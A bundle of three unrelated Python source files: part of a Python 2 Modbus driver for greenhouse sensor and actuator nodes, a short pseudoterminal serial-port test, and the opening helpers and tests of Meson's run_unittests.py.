self._detection["saddr"] = params['saddr']
self._detection["eaddr"] = params['eaddr']
self._detection["port"] = params['port']
else:
self._detection["saddr"] = 1
self._detection["eaddr"] = 5
self._detection["port"] = None
return ResCode.OK
def readregister(self, conn, addr, count, unit):
print "....... before lock for read"
with self._lock:
time.sleep(KSX3267MateV2._SLEEP)
print "read register", unit, addr, count
try:
return conn.read_holding_registers(addr, count, unit=unit)
except Exception as ex:
self._logger.warn("fail to read holding registers. : " + str(ex))
return None
def detect(self):
detected = {}
for port, conn in self._conn.iteritems():
if self._isdetecting == False or self.isexecuting() == False:
self._logger.info("Total detection is canceled.")
break
info = self.detectone(port, conn)
detected[port] = info
self._logger.info ("finished to detect devices : " + str(detected))
noti = Notice(None, NotiCode.DETECT_FINISHED) # Detection Started
if noti:
noti.setkeyvalue("opid", self._detection["opid"])
for port, info in detected.iteritems():
noti.setcontent(port, info)
self.writecb(noti)
self.setdetection(False)
def detectone(self, port, conn):
detected = {}
if self._detection["port"] is not None and port not in self._detection["port"]:
return detected
for unit in range(self._detection["saddr"], self._detection["eaddr"]):
if self._isdetecting == False or self.isexecuting() == False:
self._logger.info("A port " + str(port) + " detection is canceled.")
break
tempid = port + "-" + str(unit)
noti = Notice(None, NotiCode.DETECT_NODE_STARTED, devid=tempid) # Detection Started
if noti:
noti.setkeyvalue("opid", self._detection["opid"])
self.writecb(noti)
noti = None
info = None
res = None
for _ in range(3):
res = self.readregister(conn, KSX3267MateV2._DEVINFOREG, 6, unit)
if res is None or res.isError():
continue
if len(res.registers) != 6:
self._logger.info("retry to get data since size of data is not matched. 6 " + str(len(res.registers)))
continue
break
if res is None or res.isError():
noti = Notice(None, NotiCode.DETECT_NO_NODE, devid=tempid) # Detection Started
self._logger.info ("Fail to get information from a node : " + str(unit) + " " + str(res))
elif res.registers[1] in (NodeType.SENNODE, NodeType.ACTNODE, NodeType.INTNODE): # device type
if res.registers[3] == ProtoVer.KS_X_3267_2018:
info = self.detect_node(conn, unit, res.registers)
self._logger.info ("Found a node : " + str(unit) + " " + str(info))
else:
noti = Notice(None, NotiCode.DETECT_UNKNOWN_PROTOCOL_VER, devid=tempid) # unknown protocol version
elif res.registers[1] == NodeType.NUTNODE:
if res.registers[3] == ProtoVer.TTA_1:
info = self.detect_node(conn, unit, res.registers)
self._logger.info ("Found a nutrient system : " + str(unit) + " " + str(info))
else:
noti = Notice(None, NotiCode.DETECT_UNKNOWN_PROTOCOL_VER, devid=tempid) # unknown protocol version
else:
noti = Notice(unit, NotiCode.DETECT_UNKNOWN_NODE, devid=tempid) # unknown device
if noti is None:
if info is None:
noti = Notice(None, NotiCode.DETECT_WRONG_DEVICE, devid=tempid) # fail to find a node
else:
noti = Notice(None, NotiCode.DETECT_NODE_DETECTED, devid=port, content={unit : info}) # found a node
detected[unit] = info
noti.setkeyvalue("opid", self._detection["opid"])
print "noti", noti.stringify()
self.writecb(noti)
time.sleep(0.1)
return detected
def canceldetection(self, params):
time.sleep(self._timeout)
noti = Notice(None, NotiCode.DETECT_CANCELED) # detection is canceled
noti.setkeyvalue("opid", self._detection["opid"])
self.writecb(noti)
self.setdetection(False)
return ResCode.OK
def _listen(self, opt):
try:
servsoc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
servsoc.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
servsoc.bind((opt['host'], opt['port']))
servsoc.listen(1)
self._logger.info("listen : " + str(opt))
executing = True
while executing:
self._logger.info("waiting a client~")
rsoc, wsoc, esoc = select.select([servsoc], [], [], 10)
for sock in rsoc:
if sock == servsoc:
clisoc, address = servsoc.accept()
self._logger.info("client connected from " + str(address))
for tmp in self._tempthd:
if tmp["port"] == opt["port"]:
conn = ModbusTcpClient(timeout=self._timeout)
conn.socket = clisoc
self._conn[opt["port"]] = conn
tmp["status"] = 10 # connected
executing = False
except Exception as ex:
servsoc.close()
for tmp in self._tempthd:
if tmp["port"] == opt["port"]:
self._logger.warn(" port [" + str(opt["port"]) + "] exception : " + str(ex))
tmp["status"] = 5 # error
def listen(self, opt):
tmp = {"thd" : Thread(target=self._listen, args=(opt)), "status": 0, "port":opt['port']}
self._tempthd.append(tmp)
tmp["thd"].start()
def checktempthreads(self):
for tmp in self._tempthd:
if tmp["status"] > 2:
tmp["thd"].stop()
tmp["thd"].join()
def connectone(self, opt):
ret = False
conn = None
if opt['method'] == 'rtu':
conn = ModbusSerialClient(method='rtu', port=opt['port'],
timeout=self._timeout, baudrate=opt['baudrate'])
ret = conn.connect()
msg = "failed to connect with rtu"
code = NotiCode.RTU_CONNECTED if ret else NotiCode.RTU_FAILED_CONNECTION
elif opt['method'] == 'tcpc':
conn = ModbusTcpClient(opt['host'], port=opt['port'], timeout=self._timeout)
ret = conn.connect()
msg = "failed to connect with tcp"
code = NotiCode.TCP_CONNECTED if ret else NotiCode.RTU_FAILED_CONNECTION
elif opt['method'] == 'tcpcs':
self._logger.info("It would wait for a while to connect a client.")
ret = self.listen(opt)
msg = "failed to connect with tcp"
code = NotiCode.TCP_WAITING if ret else NotiCode.RTU_FAILED_CONNECTION
conn = None
else:
msg = "It's a wrong connection method. " + str(opt['method'])
if ret == False:
self._logger.warn(msg)
noti = Notice(None, NotiCode.RTU_FAILED_CONNECTION) # detection is canceled
else:
noti = Notice(None, NotiCode.RTU_CONNECTED) # detection is canceled
self.writecb(noti)
return conn
def connect(self):
ret = False
for opt in self._option['conn']:
conn = self.connectone(opt)
if conn:
self._conn[opt["port"][8:]] = conn
super(KSX3267MateV2, self).connect()
return ret
def closeone(self, port):
self._conn[port].close()
def close(self):
for port in self._conn.keys():
self.closeone(port)
super(KSX3267MateV2, self).close()
def readmsg(self):
self._msgq = []
for gw in self._devinfo:
for nd in gw["children"]:
self._msgq.append(self.readsensornodeinfo(nd))
if self._isdetecting:
self.detect()
self.checktempthreads()
def processrequest(self, dev, request, node):
gw = self._devinfo.findgateway(request.getnodeid())
unit = self.getdk(dev, 0)
operation = request.getcommand()
params = request.getparams()
params["operation"] = operation # need to convert by case
params["opid"] = request.getopid() # need to convert by case
properparams = CmdCode.getparams(operation) + ["operation", "opid"]
registers = []
for key in self.getdk(dev, 4):
if key not in properparams:
# key param is not used for this operation
# However, the register should be filled.
val = 0
elif key in params:
val = params[key]
else:
self._logger.warn("Wrong Keyword : " + str(key))
return ResCode.FAIL_WRONG_KEYWORD
if KSX3267MateV2._KEYWORDS[key][0] == 1:
registers.append(val)
elif KSX3267MateV2._KEYWORDS[key][1] == "int":
registers.extend(struct.unpack('HH', struct.pack('i', val)))
elif KSX3267MateV2._KEYWORDS[key][1] == "float":
registers.extend(struct.unpack('HH', struct.pack('f', val)))
#else:
# self._logger.warn("This param is needed for this operation. " + str(params['operation']) + ", " + str(key))
# return ResCode.FAIL_WRONG_KEYWORD
print "....... befor lock for write"
with self._lock:
time.sleep(KSX3267MateV2._SLEEP)
print "....... lock for write", self.getdk(dev, 3), registers
res = self._conn[gw["dk"]].write_registers(self.getdk(dev, 3), registers, unit=unit)
if res.isError():
self._logger.warn("Fail to write a request to dev." + str(dev) + "," + str(res) + ":" + str(request))
return ResCode.FAIL_TO_WRITE
msg = self.readactinfo(node, dev)
if msg is None:
self._logger.warn("Fail to read dev status.")
else:
self.sendnoticeforactuatorstatus(msg)
return ResCode.OK
def writeblk(self, blk):
print "received message", blk.getdevid(), self._coupleid
if BlkType.isrequest(blk.gettype()) is False:
self._logger.warn("The message is not request. " + str(blk.gettype()))
return False
response = Response(blk)
cmd = blk.getcommand()
nd = self._devinfo.finddevbyid(blk.getnodeid())
dev = self._devinfo.finddevbyid(blk.getdevid())
if blk.getdevid() == self._coupleid:
params = blk.getparams()
if cmd == CmdCode.DETECT_DEVICE:
print "detect device"
code = self.startdetection(params, blk.getopid())
elif cmd == CmdCode.CANCEL_DETECT:
print "cancel to detect device"
code = self.canceldetection(params)
else:
self._logger.warn("Unknown Error. " + str(blk) + ", " + str(dev))
code = ResCode.FAIL
elif dev is None:
self._logger.warn("There is no device. " + str(blk.getdevid()))
code = ResCode.FAIL_NO_DEVICE
elif DevType.ispropercommand(dev['dt'], cmd) is False:
self._logger.warn("The request is not proper. " + str(cmd) + " " + str(dev['dt']))
code = ResCode.FAIL_NOT_PROPER_COMMAND
elif DevType.isactuator(dev['dt']) or DevType.isnode(dev['dt']):
# modbus
code = self.processrequest(dev, blk, nd)
self._logger.info("Actuator processed : " + str(code))
elif DevType.isgateway(dev['dt']):
self._logger.info("Gateway does not receive a request")
code = ResCode.FAIL
else:
self._logger.warn("Unknown Error. " + str(blk) + ", " + str(dev))
code = ResCode.FAIL
response.setresult(code)
self._logger.info("write response: " + str(response))
self.writecb(response)
return True #if code == ResCode.OK else False
def parseregisters(self, names, values):
idx = 0
ret = {}
for nm in names:
(size, vtype) = KSX3267MateV2._KEYWORDS[nm]
if vtype == "float":
val = struct.unpack('f', struct.pack('HH', values[idx], values[idx+1]))[0]
elif vtype == "int":
val = struct.unpack('i', struct.pack('HH', values[idx], values[idx+1]))[0]
else:
val = values[idx]
ret[nm] = val
idx = idx + size
print "parsed", ret
return ret
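# Illustrative sketch (not part of the mate): 32-bit values arrive as two
# consecutive 16-bit Modbus registers, and parseregisters() above reassembles
# them with struct. A round-trip under the same 'HH' register layout looks like:
#   regs = struct.unpack('HH', struct.pack('f', 23.5))      # float -> two registers
#   val = struct.unpack('f', struct.pack('HH', *regs))[0]   # two registers -> 23.5
# This relies on the host byte order matching what the node sends; a stricter
# decoder would pin the endianness explicitly (e.g. '<HH' / '<f').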
def readinfofromdev(self, conn, dev):
size = self.getsize(self.getdk(dev, 2))
#for _ in range(3):
res = self.readregister(conn, self.getdk(dev, 1), size, self.getdk(dev, 0))
if res is None:
self._logger.warn("fail to get status from " + str(dev['dk']))
# break
elif res.isError():
self._logger.info("retry to get status from " + str(dev['dk']) + " " + str(res))
# continue
else:
if len(res.registers) == size:
return self.parseregisters(self.getdk(dev, 2), res.registers)
else:
self._logger.info("retry to get data since size of data is not matched. " + str(size) + " " + str(len(res.registers)))
return None
def readnodeinfo(self, node):
ret = {"id" : node["id"], "sen" : {}, "act" : {}, "nd" : {"status":StatCode.ERROR.value}}
gw = self._devinfo.findgateway(node["id"])
conn = self._conn[gw["dk"]]
ret["conn"] = conn
info = self.readinfofromdev(conn, node)
if info:
ret["nd"] = info
else:
self._logger.warn("fail to read node info : " + str(node))
return ret
def readsensornodeinfo(self, node):
ret = self.readnodeinfo(node)
for dev in node['children']:
if DevType.issensor(dev["dt"]):
info = self.readinfofromdev(ret["conn"], dev)
if info:
ret["sen"][dev["id"]] = info
#else:
# self._logger.warn("fail to read sensor info : " + str(dev) + " however continue to read other device")
return ret
def readactnodeinfo(self, node):
ret = self.readnodeinfo(node)
for dev in node['children']:
if DevType.issensor(dev["dt"]) == False:
info = self.readinfofromdev(ret["conn"], dev)
if info:
ret["act"][dev["id"]] = info
else:
self._logger.warn("fail to read actuator info : " + str(dev) + " however continue to read other device")
return ret
def readactinfo(self, node, act):
ret = self.readnodeinfo(node)
info = self.readinfofromdev(ret["conn"], act)
if info:
ret["act"][act["id"]] = info
else:
self._logger.warn("fail to read actuator info : " + str(act) + " however continue to read other device")
return ret
def sendobs(self):
for msg in self._msgq:
if msg is None:
continue
self.sendobservation(msg)
def sendnoti(self):
for gw in self._devinfo:
for node in gw["children"]:
ret = self.readnodeinfo(node)
i = 1
for dev in node['children']:
if DevType.issensor(dev["dt"]) == False:
info = self.readinfofromdev(ret["conn"], dev)
if info:
ret["act"][dev["id"]] = info
i = i + 1
if i % 3 == 0:
self.sendnoticeforactuatorstatus(ret)
ret["act"] = {}
self.sendnoticeforactuatorstatus(ret)
def sendobservation(self, ndinfo):
if StatCode.has_value(ndinfo["nd"]["status"]) == False:
ndinfo["nd"]["status"] = StatCode.ERROR.value
obsblk = Observation(ndinfo["id"])
obsblk.setobservation(ndinfo["id"], 0, StatCode(ndinfo["nd"]["status"]))
for devid, info in ndinfo["sen"].iteritems():
if StatCode.has_value(info["status"]) == False:
info["status"] = StatCode.ERROR.value
obsblk.setobservation(devid, info["value"], StatCode(info["status"]))
# do not send observation for actuator
#for devid, info in ndinfo["act"].iteritems():
# if StatCode.has_value(info["status"]) == False:
# info["status"] = StatCode.ERROR.value
# obsblk.setobservation(devid, 0, StatCode(info["status"]))
self.writecb(obsblk)
def sendnoticeforactuatorstatus(self, ndinfo):
blk = Notice(ndinfo["id"], NotiCode.ACTUATOR_STATUS, ndinfo["id"], ndinfo["nd"])
for devid, info in ndinfo["act"].iteritems():
blk.setcontent(devid, info)
self.writecb(blk)
def start(self, writecb):
super(KSX3267MateV2, self).start(writecb)
return True
def stop(self):
super(KSX3267MateV2, self).stop()
return True
def getsize(self, lst):
size = 0
for k in lst:
if k in KSX3267MateV2._KEYWORDS:
size = size + KSX3267MateV2._KEYWORDS[k][0]
else:
self._logger.warn("wrong keyword : " + str(k))
return -1
return size
if __name__ == "__main__":
isnutri = False
opt = {
'conn' : [{
'method': 'rtu',
'port' : '/dev/ttyJND2',
'baudrate' : 9600,
'timeout': 5
}]
}
nutriinfo = [{
"id" : "1", "dk" : "", "dt": "gw", "children" : [{
"id" : "101", "dk" : '[1,40201,["status"],45001,["operation","opid"]]', "dt": "nd", "children" : [
{"id" : "102", "dk" : '[1,40211,["control","status","area","alert","opid"],45001,["operation", "opid", "control","EC","pH", "start-area", "stop-area", "on-sec"]]', "dt": "nutrient-supply/level1"},
{"id" : "103", "dk" : '[1,40221,["value","status"]]', "dt": "sen"},
{"id" : "104", "dk" : '[1,40231,["value","status"]]', "dt": "sen"},
{"id" : "105", "dk" : '[1,40241,["value","status"]]', "dt": "sen"},
{"id" : "106", "dk" : '[1,40251,["value","status"]]', "dt": "sen"},
{"id" : "107", "dk" : '[1,40261,["value","status"]]', "dt": "sen"},
{"id" : "109", "dk" : '[1,40271,["value","status"]]', "dt": "sen"},
{"id" : "110", "dk" : '[1,40281,["value","status"]]', "dt": "sen"},
{"id" : "111", "dk" : '[1,40291,["value","status"]]', "dt": "sen"},
{"id" : "112", "dk" : '[1,40301,["value","status"]]', "dt": "sen"},
{"id" : "113", "dk" : '[1,40311,["value","status"]]', "dt": "sen"}
]}
]}
]
devinfo = [{
"id" : "1", "dk" : "JND2", "dt": "gw", "children" : [
# {
# "id" : "101", "dk" : '[1,201,["status"],301,["operation","opid"]]', "dt": "nd", "children" : [
#{"id" : "102", "dk" : '[1,210,["value","status"]]', "dt": "sen"},
#{"id" : "103", "dk" : '[1,220,["value","status"]]', "dt": "sen"}
# "id" : "101", "dk" : '[1,40201,["status"],45001,["operation","opid"]]', "dt": "nd", "children" : [
#{"id" : "102", "dk" : '[1,41010,["value","status"]]', "dt": "sen"},
#{"id" : "103", "dk" : '[1,41020,["value","status"]]', "dt": "sen"}
# {"id" : "102", "dk" : '[1,40202,["value","status"]]', "dt": "sen"},
# {"id" : "103", "dk" : '[1,40205,["value","status"]]', "dt": "sen"},
#{"id" : "104", "dk" : '[1,40208,["value","status"]]', "dt": "sen"},
# {"id" : "105", "dk" : '[1,40211,["value","status"]]', "dt": "sen"},
#{"id" : "106", "dk" : '[1,40251,["value","status"]]', "dt": "sen"},
#{"id" : "107", "dk" : '[1,40261,["value","status"]]', "dt": "sen"},
#{"id" : "108", "dk" : '[1,40271,["value","status"]]', "dt": "sen"},
#{"id" : "109", "dk" : '[1,40281,["value","status"]]', "dt": "sen"},
#{"id" : "110", "dk" : '[1,40291,["value","status"]]', "dt": "sen"}
# ]
# }
]
}]
"""
}, {
"id" : "201", "dk" : '[2,40201,["status"],45001,["operation","opid"]]', "dt": "nd", "children" : [
{"id" : "202", "dk" : '[2,40202,["opid","status","state-hold-time","remain-time"],40206,["operation","opid","time"]]', "dt": "act/retractable/level1"},
{"id" : "202", "dk" : '[2,40209,["opid","status","state-hold-time","remain-time"],40213,["operation","opid","time"]]', "dt": "act/retractable/level1"},
{"id" : "203", "dk" : '[2,40216,["value","status"]]', "dt": "sen"},
{"id" : "204", "dk" : '[2,40219,["value","status"]]', "dt": "sen"},
#{"id" : "203", "dk" : (2,40221,["opid","status"],45021,["operation","opid"]), "dt": "act/switch/level0"},
#{"id" : "204", "dk" : (2,40231,["opid","status"],45031,["operation","opid"]), "dt": "act/switch/level0"},
#{"id" : "205", "dk" : (2,40241,["opid","status"],45041,["operation","opid"]), "dt": "act/switch/level0"},
#{"id" : "206", "dk" : (2,40251,["opid","status"],45051,["operation","opid"]), "dt": "act/switch/level0"},
#{"id" : "207", "dk" : (2,40261,["opid","status"],45061,["operation","opid"]), "dt": "act/switch/level0"},
#{"id" : "208", "dk" : (2,40271,["opid","status"],45071,["operation","opid"]), "dt": "act/switch/level0"},
#{"id" : "209", "dk" : (2,40281,["opid","status"],45081,["operation","opid"]), "dt": "act/switch/level0"}
]
}, {
"id" : "301", "dk" : (3,40201,["opid","status"],45001,["operation","opid"]), "dt": "nd", "children" : [
{"id" : "302", "dk" : (3,40211,["opid","status"],45011,["operation","opid"]), "dt": "act/retractable/level0"},
{"id" : "303", "dk" : (3,40221,["opid","status"],45021,["operation","opid"]), "dt": "act/retractable/level0"},
{"id" : "304", "dk" : (3,40231,["opid","status"],45031,["operation","opid"]), "dt": "act/retractable/level0"},
{"id" : "305", "dk" : (3,40241,["opid","status"],45041,["operation","opid"]), "dt": "act/retractable/level0"}
]
}]
}]
"""
if isnutri:
kdmate = KSX3267MateV2(opt, nutriinfo, "1", None)
else:
kdmate = KSX3267MateV2(opt, devinfo, "1", None)
mate = Mate ({}, [], "1", None)
kdmate.start (mate.writeblk)
print "mate started"
time.sleep(10)
req = Request(None)
req.setcommand("1", CmdCode.DETECT_DEVICE, None)
print "=======================================#1"
kdmate.writeblk(req)
print "=======================================#1"
"""
time.sleep(1)
req = Request(None)
req.setcommand("1", CmdCode.CANCEL_DETECT, {})
print "=======================================#2"
kdmate.writeblk(req)
print "=======================================#2"
time.sleep(1)
req = Request(None)
req.setcommand("1", CmdCode.DETECT_DEVICE, None)
print "=======================================#3"
kdmate.writeblk(req)
print "=======================================#3"
time.sleep(1)
req = Request(None)
req.setcommand("1", CmdCode.CANCEL_DETECT, {})
print "=======================================#4"
kdmate.writeblk(req)
print "=======================================#4"
time.sleep(10)
req = Request(201)
req.setcommand(202, CmdCode.OPEN, {})
kdmate.writeblk(req)
time.sleep(5)
req = Request(201)
req.setcommand(202, CmdCode.OFF, {})
kdmate.writeblk(req)
time.sleep(10)
req = Request(201)
req.setcommand(202, CmdCode.TIMED_OPEN, {"time":10})
kdmate.writeblk(req)
time.sleep(15)
req = Request(201)
req.setcommand(202, CmdCode.TIMED_CLOSE, {"time":10})
kdmate.writeblk(req)
time.sleep(5)
req = Request(201)
req.setcommand(202, CmdCode.OFF, {})
kdmate.writeblk(req)
"""
time.sleep(30)
kdmate.stop()
print "mate stopped"
|
porttest.py
|
import os, pty
from serial import Serial
import threading
def listener(port):
#continuously listen to commands on the master device
while 1:
res = b""
while not res.endswith(b"\r\n"):
#keep reading one byte at a time until we have a full line
res += os.read(port, 1)
print("command: %s" % res)
#write back the response
if res == b'QPGS\r\n':
os.write(port, b"correct result\r\n")
else:
os.write(port, b"I dont understand\r\n")
def test_serial():
"""Start the testing"""
master,slave = pty.openpty() #open the pseudoterminal
s_name = os.ttyname(slave) #translate the slave fd to a filename
#create a separate thread that listens on the master device for commands
thread = threading.Thread(target=listener, args=[master])
thread.start()
#open a pySerial connection to the slave
ser = Serial(s_name, 2400, timeout=1)
ser.write(b'test2\r\n') #write the first command
res = b""
while not res.endswith(b'\r\n'):
#read the response
res +=ser.read()
print("result: %s" % res)
ser.write(b'QPGS\r\n') #write a second command
res = b""
while not res.endswith(b'\r\n'):
#read the response
res +=ser.read()
print("result: %s" % res)
if __name__=='__main__':
test_serial()
|
run_unittests.py
|
#!/usr/bin/env python3
# Copyright 2016-2017 The Meson development team
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import stat
import subprocess
import re
import json
import tempfile
import textwrap
import os
import shutil
import sys
import unittest
import platform
import pickle
import functools
import io
import operator
import threading
import urllib.error
import urllib.request
import zipfile
import hashlib
from itertools import chain
from unittest import mock
from configparser import ConfigParser
from contextlib import contextmanager
from glob import glob
from pathlib import (PurePath, Path)
from distutils.dir_util import copy_tree
import mesonbuild.mlog
import mesonbuild.depfile
import mesonbuild.dependencies.base
import mesonbuild.compilers
import mesonbuild.envconfig
import mesonbuild.environment
import mesonbuild.mesonlib
import mesonbuild.coredata
import mesonbuild.modules.gnome
from mesonbuild.interpreter import Interpreter, ObjectHolder
from mesonbuild.ast import AstInterpreter
from mesonbuild.mesonlib import (
BuildDirLock, LibType, MachineChoice, PerMachine, Version, is_windows,
is_osx, is_cygwin, is_dragonflybsd, is_openbsd, is_haiku, is_sunos,
windows_proof_rmtree, python_command, version_compare, split_args,
quote_arg, relpath
)
from mesonbuild.environment import detect_ninja
from mesonbuild.mesonlib import MesonException, EnvironmentException
from mesonbuild.dependencies import PkgConfigDependency, ExternalProgram
import mesonbuild.dependencies.base
from mesonbuild.build import Target, ConfigurationData
import mesonbuild.modules.pkgconfig
from mesonbuild.mtest import TAPParser, TestResult
from run_tests import (
Backend, FakeBuild, FakeCompilerOptions,
ensure_backend_detects_changes, exe_suffix, get_backend_commands,
get_builddir_target_args, get_fake_env, get_fake_options, get_meson_script,
run_configure_inprocess, run_mtest_inprocess
)
URLOPEN_TIMEOUT = 5
@contextmanager
def chdir(path: str):
curdir = os.getcwd()
os.chdir(path)
yield
os.chdir(curdir)
def get_dynamic_section_entry(fname, entry):
if is_cygwin() or is_osx():
raise unittest.SkipTest('Test only applicable to ELF platforms')
try:
raw_out = subprocess.check_output(['readelf', '-d', fname],
universal_newlines=True)
except FileNotFoundError:
# FIXME: Try using depfixer.py:Elf() as a fallback
raise unittest.SkipTest('readelf not found')
pattern = re.compile(entry + r': \[(.*?)\]')
for line in raw_out.split('\n'):
m = pattern.search(line)
if m is not None:
return m.group(1)
return None # The file did not contain the specified entry.
def get_soname(fname):
return get_dynamic_section_entry(fname, 'soname')
def get_rpath(fname):
return get_dynamic_section_entry(fname, r'(?:rpath|runpath)')
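# Illustrative example (not part of the suite): `readelf -d libfoo.so` prints
# lines such as
#   0x000000000000000e (SONAME)   Library soname: [libfoo.so.1]
#   0x000000000000001d (RUNPATH)  Library runpath: [$ORIGIN/../lib]
# get_dynamic_section_entry() pulls out the bracketed value, so get_soname()
# would return 'libfoo.so.1' and get_rpath() '$ORIGIN/../lib' for this file.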
def is_tarball():
if not os.path.isdir('docs'):
return True
return False
def is_ci():
if 'CI' in os.environ:
return True
return False
def is_pull():
# Travis
if os.environ.get('TRAVIS_PULL_REQUEST', 'false') != 'false':
return True
# Azure
if 'SYSTEM_PULLREQUEST_ISFORK' in os.environ:
return True
return False
def _git_init(project_dir):
subprocess.check_call(['git', 'init'], cwd=project_dir, stdout=subprocess.DEVNULL)
subprocess.check_call(['git', 'config',
'user.name', 'Author Person'], cwd=project_dir)
subprocess.check_call(['git', 'config',
'user.email', '[email protected]'], cwd=project_dir)
subprocess.check_call('git add *', cwd=project_dir, shell=True,
stdout=subprocess.DEVNULL)
subprocess.check_call(['git', 'commit', '-a', '-m', 'I am a project'], cwd=project_dir,
stdout=subprocess.DEVNULL)
@functools.lru_cache()
def is_real_gnu_compiler(path):
'''
Check if the gcc we have is a real gcc and not a macOS wrapper around clang
'''
if not path:
return False
out = subprocess.check_output([path, '--version'], universal_newlines=True, stderr=subprocess.STDOUT)
return 'Free Software Foundation' in out
def skipIfNoExecutable(exename):
'''
Skip this test if the given executable is not found.
'''
def wrapper(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
if shutil.which(exename) is None:
raise unittest.SkipTest(exename + ' not found')
return func(*args, **kwargs)
return wrapped
return wrapper
def skipIfNoPkgconfig(f):
'''
Skip this test if no pkg-config is found, unless we're on CI.
This allows users to run our test suite without having
pkg-config installed on, f.ex., macOS, while ensuring that our CI does not
silently skip the test because of misconfiguration.
Note: Yes, we provide pkg-config even while running Windows CI
'''
@functools.wraps(f)
def wrapped(*args, **kwargs):
if not is_ci() and shutil.which('pkg-config') is None:
raise unittest.SkipTest('pkg-config not found')
return f(*args, **kwargs)
return wrapped
def skipIfNoPkgconfigDep(depname):
'''
Skip this test if the given pkg-config dep is not found, unless we're on CI.
'''
def wrapper(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
if not is_ci() and shutil.which('pkg-config') is None:
raise unittest.SkipTest('pkg-config not found')
if not is_ci() and subprocess.call(['pkg-config', '--exists', depname]) != 0:
raise unittest.SkipTest('pkg-config dependency {} not found.'.format(depname))
return func(*args, **kwargs)
return wrapped
return wrapper
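# Example usage (illustrative only): the decorators above are applied directly
# to test methods, e.g.
#   @skipIfNoPkgconfig
#   def test_something_pkgconfig_based(self):
#       ...
#   @skipIfNoPkgconfigDep('glib-2.0')
#   def test_something_needing_glib(self):
#       ...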
def skip_if_no_cmake(f):
'''
Skip this test if no cmake is found, unless we're on CI.
This allows users to run our test suite without having
cmake installed on, f.ex., macOS, while ensuring that our CI does not
silently skip the test because of misconfiguration.
'''
@functools.wraps(f)
def wrapped(*args, **kwargs):
if not is_ci() and shutil.which('cmake') is None:
raise unittest.SkipTest('cmake not found')
return f(*args, **kwargs)
return wrapped
def skip_if_not_language(lang):
def wrapper(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
try:
env = get_fake_env()
f = getattr(env, 'detect_{}_compiler'.format(lang))
f(MachineChoice.HOST)
except EnvironmentException:
raise unittest.SkipTest('No {} compiler found.'.format(lang))
return func(*args, **kwargs)
return wrapped
return wrapper
def skip_if_env_set(key):
'''
Skip a test if a particular env is set, except when running under CI
'''
def wrapper(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
old = None
if key in os.environ:
if not is_ci():
raise unittest.SkipTest('Env var {!r} set, skipping'.format(key))
old = os.environ.pop(key)
try:
return func(*args, **kwargs)
finally:
if old is not None:
os.environ[key] = old
return wrapped
return wrapper
def skip_if_not_base_option(feature):
"""Skip tests if The compiler does not support a given base option.
for example, ICC doesn't currently support b_sanitize.
"""
def actual(f):
@functools.wraps(f)
def wrapped(*args, **kwargs):
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
if feature not in cc.base_options:
raise unittest.SkipTest(
'{} not available with {}'.format(feature, cc.id))
return f(*args, **kwargs)
return wrapped
return actual
@contextmanager
def temp_filename():
'''A context manager which provides a filename to an empty temporary file.
On exit the file will be deleted.
'''
fd, filename = tempfile.mkstemp()
os.close(fd)
try:
yield filename
finally:
try:
os.remove(filename)
except OSError:
pass
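# Example usage (illustrative only): temp_filename() hands out a path to an
# empty file and deletes it again when the with-block exits.
#   with temp_filename() as fname:
#       with open(fname, 'w') as f:
#           f.write('scratch data')
#   # fname no longer exists here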
@contextmanager
def no_pkgconfig():
'''
A context manager that overrides shutil.which and ExternalProgram to force
them to return None for pkg-config to simulate it not existing.
'''
old_which = shutil.which
old_search = ExternalProgram._search
def new_search(self, name, search_dir):
if name == 'pkg-config':
return [None]
return old_search(self, name, search_dir)
def new_which(cmd, *kwargs):
if cmd == 'pkg-config':
return None
return old_which(cmd, *kwargs)
shutil.which = new_which
ExternalProgram._search = new_search
try:
yield
finally:
shutil.which = old_which
ExternalProgram._search = old_search
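# Example usage (illustrative only): tests exercising the "pkg-config missing"
# code path can wrap the relevant lookups:
#   with no_pkgconfig():
#       # shutil.which('pkg-config') and ExternalProgram._search now report
#       # pkg-config as unavailable inside this block
#       ...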
class InternalTests(unittest.TestCase):
def test_version_number(self):
searchfunc = mesonbuild.environment.search_version
self.assertEqual(searchfunc('foobar 1.2.3'), '1.2.3')
self.assertEqual(searchfunc('1.2.3'), '1.2.3')
self.assertEqual(searchfunc('foobar 2016.10.28 1.2.3'), '1.2.3')
self.assertEqual(searchfunc('2016.10.28 1.2.3'), '1.2.3')
self.assertEqual(searchfunc('foobar 2016.10.128'), 'unknown version')
self.assertEqual(searchfunc('2016.10.128'), 'unknown version')
def test_mode_symbolic_to_bits(self):
modefunc = mesonbuild.mesonlib.FileMode.perms_s_to_bits
self.assertEqual(modefunc('---------'), 0)
self.assertEqual(modefunc('r--------'), stat.S_IRUSR)
self.assertEqual(modefunc('---r-----'), stat.S_IRGRP)
self.assertEqual(modefunc('------r--'), stat.S_IROTH)
self.assertEqual(modefunc('-w-------'), stat.S_IWUSR)
self.assertEqual(modefunc('----w----'), stat.S_IWGRP)
self.assertEqual(modefunc('-------w-'), stat.S_IWOTH)
self.assertEqual(modefunc('--x------'), stat.S_IXUSR)
self.assertEqual(modefunc('-----x---'), stat.S_IXGRP)
self.assertEqual(modefunc('--------x'), stat.S_IXOTH)
self.assertEqual(modefunc('--S------'), stat.S_ISUID)
self.assertEqual(modefunc('-----S---'), stat.S_ISGID)
self.assertEqual(modefunc('--------T'), stat.S_ISVTX)
self.assertEqual(modefunc('--s------'), stat.S_ISUID | stat.S_IXUSR)
self.assertEqual(modefunc('-----s---'), stat.S_ISGID | stat.S_IXGRP)
self.assertEqual(modefunc('--------t'), stat.S_ISVTX | stat.S_IXOTH)
self.assertEqual(modefunc('rwx------'), stat.S_IRWXU)
self.assertEqual(modefunc('---rwx---'), stat.S_IRWXG)
self.assertEqual(modefunc('------rwx'), stat.S_IRWXO)
# We could keep listing combinations exhaustively but that seems
# tedious and pointless. Just test a few more.
